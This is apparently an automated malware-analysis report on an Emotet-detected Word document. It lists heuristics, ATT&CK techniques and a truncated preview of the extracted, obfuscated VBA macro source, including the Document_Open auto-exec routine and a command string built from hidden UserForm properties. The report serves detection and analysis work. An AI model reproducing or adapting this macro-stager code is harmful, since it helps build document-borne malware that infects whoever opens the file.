MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains VBA macros, including a Document_Open auto-execution macro, and utilizes CreateObject, indicative of a downloader. The critical heuristic 'OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER' strongly suggests the use of a hidden UserForm to execute commands, a known technique for Emotet. ClamAV detection further confirms its malicious nature and identifies it as Emotet.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-7462723-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7462723-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10967 bytes |
SHA-256: 769fe73979304f43785ed253caafb54ee04ebd0684a62ddae0ab52d4fc3c2442 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Fobwlyxpcdd"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Xzfzzpekt, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Gkkztgyuqmwfe = Dynnvubbcahoe
Pkfyefki = Mnwseludwmvje
Fihylstan = Zfvqtqjoig
Select _
Case Xomkihiggf
Case 703
Wcjsgtmjvsmpi _
= Hex _
(819)
Fzqrxaajkzhl = CVar(138)
Qftlwtqgq _
= Hex(495)
Case 342
Tvnfcxccocg = CVar(620)
Wywtztyitef _
= 232
Dlmcyjhbdeme = CDate _
(679)
Case 317
Fiecjqfo = _
CInt(427)
Xhxkharisitqq = Log(Ximtukor)
Zpbwwopnperl = Dnemzhpsrylh
End Select
Rwonupdjrk = Rkfstrybts
Muvlpwkav = Cweewhwnwty
Hnxyoorz = Aatrtuadp
Select _
Case Cwoncuwfwooy
Case 115
Bzlmgzpz _
= Hex _
(642)
Dcpcsvpi = CVar(774)
Frjkluuuh _
= Hex(382)
Case 143
Byosvoqibg = CVar(880)
Kkaftmazg _
= 555
Ykpbbmfvrxs = CDate _
(615)
Case 48
Akwhyztz = _
CInt(257)
Yaloahgsfx = Log(Hfnpwwkljsi)
Jqtaglqw = Aqxenkfmeuk
End Select
Xrfxikrbjt = Dfilqviflycou
Lhidkpztxwz = Viulhoauv
Pswzzprc = Ftapfgdlkprg
Select _
Case Ddqggbwqdh
Case 693
Tauhfxiopou _
= Hex _
(208)
Iwikokjr = CVar(732)
Wykvewpqtbnnd _
= Hex(675)
Case 87
Ktxmuoju = CVar(311)
Fnfowezgeyiub _
= 624
Zyauoutrherm = CDate _
(48)
Case 531
Hmegxzijcxxo = _
CInt(575)
Tupstuuqizpdl = Log(Jfrvowleoeejq)
Xaouympz = Xqdeqtnmlt
End Select
Erggvkote
End Sub
Attribute VB_Name = "Kgszqoekrxovz"
Attribute VB_Base = "0{ED59ADE0-B621-4AD0-9922-53E442FB5C2E}{B74B4113-2BC7-4C4A-9E09-EE09E0ACE9F4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Pkkxwszjoh"
Function Ctwmsspajbnl()
Fjtddrtmx = Urkualrtiy
Upvyivcsj = Qdfgffctwbt
Bfvkylbjb = Oitkqvocyduqv
Select _
Case Ogfhfbgmxd
Case 915
Uxtdoahsxlrc _
= Hex _
(155)
Rkehpafmxve = CVar(962)
Xivwhrctefafp _
= Hex(700)
Case 159
Ncocfrjwip = CVar(248)
Mhaxytckkcpkk _
= 594
Medbzntyuhbo = CDate _
(234)
Case 157
Mmgtsqmeibl = _
CInt(875)
Clndshyw = Log(Nnlsifpxf)
Xpjqsighwcqnk = Hdjhhruisfh
End Select
Uytfuxviy = Fobwlyxpcdd.Xzfzzpekt
Deavfenuiyiby = Apntsbwhcg
Idejksawvp = Kbuxtvmesaefj
Yhxyocveqeoxi = Qlxpjrgzn
Select _
Case Yqiyyazvbpyr
Case 211
Owdtexegljth _
= Hex _
(614)
Fshjruef = CVar(704)
Foynwrstuvuu _
= Hex(251)
Case 416
Jjpreyfqg = CVar(8)
Ihoaipjzmnq _
= 394
Jurznyhkpca = CDate _
(689)
Case 803
Naymoiaxn = _
CInt(140)
Tlflvqss = Log(Hkgfdhqftfosd)
Bzzhztvko = Tvpzjhyg
End Select
Rvkblpdfitdv = Uytfuxviy + Kgszqoekrxovz.Oararlfqkzr + Kgszqoekrxovz.Vkvixncea + Kgszqoekrxovz.Fjwgfvwot
Kfwdcingw = Zzrvjkhkmnstx
Hkzmmiqdycnci = Yhvdltbazn
Yrrmyvebcg = Riwttvizicp
Select _
Case Uwegjzzqyslgq
Case 683
Dbhryhmdw _
= Hex _
(697)
Dfvbwcfoe = CVar(752)
Usgkwsqk _
= Hex(315)
Case 42
Hbwgvxnq = CVar(915)
Hxcwtvxwjbbj _
= 813
Golnltmm = CDate _
(689)
Case 41
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.